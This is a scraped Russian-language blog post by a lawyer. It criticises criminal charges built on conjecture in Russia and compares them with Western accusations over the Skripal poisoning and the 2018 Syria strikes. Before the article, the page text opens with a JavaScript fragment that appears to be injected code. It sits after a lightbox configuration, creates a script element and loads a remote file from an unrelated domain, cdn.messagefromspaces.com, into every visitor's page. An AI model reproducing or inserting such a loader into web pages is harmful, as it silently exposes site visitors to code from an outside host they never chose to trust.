, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Почему так востребованы домыслы?

17 Апр

Ничем не подтвержденными догадками, предположениями, наиболее часто пользуются лица, осуществляющие уголовное преследование, из числа оперативных служб. Именно им приходится выдвигать несколько версий по сведениям о признаках преступления и лицах его совершивших.

Полёт оперативных мыслей сдерживают условия проведения оперативно-розыскных мероприятий, а также использование полученных  результатов.

Однако анализ  правоприменительной практики доказывает, что результаты оперативно-розыскной деятельности, нередко, перекочёвывают из оперативных дел в дела уголовные.

Например, в постановлении о привлечении в качестве обвиняемого, следователи указывают:  «В неустановленное время, в неустановленном мести, при неустановленных обстоятельствах Н., незаконно приобрёл  наркотические средства».

Основанием такого обвинения считается то, что оперативники не смогли установить эти важные для обвинения обстоятельства. Но, при этом никто не вспоминает о том, что событие  преступления (время, место, способ и другие обстоятельства совершения преступления), подлежат доказыванию (статья 73 УПК РФ). А если их не установили, так и нельзя такой признак преступления, как «приобретение» вменять в вину. Но тысячи людей осуждены по таким обвинениям и никто, ни ведомственный контроль, ни прокурорский надзор, ни судьи, за это произвол не наказаны.

Подобное происходит и при обвинениях в бандитизме и организации преступного сообщества.

Игнорируя ответственность за должностные преступления, следователи пишут: «В неустановленное  время, в неустановленном месте, при неустановленных обстоятельствах создал устойчивую вооружённую группу (банду) или преступное сообщество…».  Такие постановления подписывают, как законные их начальники, а затем и утверждают прокуроры.

Поражало то, что с таким обвинением нередко соглашались обвиняемые. Мне, как адвокату, участвующему в судах  по делам и по назначению, не раз приходилось обращать внимание судей на то, что сторона обвинения сама в обвинительном заключении признаёт, что не обладает доказательствами о том, когда, где и при каких обстоятельствах была создана банда или преступное сообщество. Но, игнорируя мои доводы, судьи повторяли такую формулировку обвинения уже в своих приговорах.

Возможно, понимая абсурдность такого обвинения, Путин подписал и обнародовал дополнения в УПК РФ, об особом порядке судебного разбирательства. Это нововведение делало излишним какое-либо доказывание по делу. Заставляло правоприменителей забыть правила проверки и оценки доказательств. Дело оставалось за малым — добиться согласия  с предъявленным обвинением от того, кого назначили обвиняемым.

В качестве конфетки законодательно установлено, что наказание согласившемуся с обвинением не может превышать две трети максимального срока или размера наиболее строго вида наказания, предусмотренного за совершение преступление (ст. 315 УПК РФ).

Так в России ежегодно осуждают около 70% подсудимых, а это 500−600 тысяч человек.   При этом, как утверждает http://kremlin.ru/events/president/news/56863   Генеральный прокурор Ю. Чайка, делается это с миллионными нарушениями законов. И никакую общественность, никаких  уполномоченных по правам и свободам, такое «правосудие» не озаботило.

Но, вдруг, все заволновалось основанном на домыслах обвинении в отравлении Скрипаля. Так, французский лидер Эмманюэль Макрон по поводу отравлении Скрипаля  заявил https://news.ru/v-mire/makron-est-vse-osnovaniya-polagat-chto-rf-vinovna-v-otravlenii-skripalya/   : «Есть все основания полагать, что Россия совершила эту попытку убийства».

В этой связи, не может не вызывать тревогу то, что главы государств и политики, в своих суждения, ссылаются не на факты, а на предположения.

В августе 2013 года в сирийской Гуте от отравления зарином погибли более тысячи человек https://meduza.io/feature/2017/04/07/tramp-sdelal-to-na-chto-ne-reshilsya-obama-istoriya-politicheskih-sporov-o-himicheskom-oruzhii-v-sirii

«Есть все основания полагать, что это сделала не сирийская армия, а силы оппозиции», — писал тогда Путин, объясняя необходимость мирного решения вопроса.

Комиссия ООН по расследованию возможных нарушений прав человека в САР  обнародовала https://russian.rt.com/article/10107   доклад, в котором подтверждается факт применения химического оружия в ходе сирийского конфликта. Однако конкретные боевые отравляющие вещества, системы их доставки и исполнители преступления не были установлены.

Интерес к этим обстоятельствам  не проявляли много лет.

И вот, в апреле 2018 года США, Великобритания и примкнувшая к ним Франция, игнорируя   презумпцию невиновности, атаковали ракетами суверенное государство Сирия.

Таким образом, если в стране из правового поля и обязанностей, изложенных в основополагающих принципах судопроизводства, выходят правоприменители, то их начинают игнорировать и главы государств, осуществляющих государственное управление страной.

Беда состоит в том, что поддерживать «презумпцию виновности» в международной политике готовы страны, считающие себя правовыми и почитающие презумпцию невиновности.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.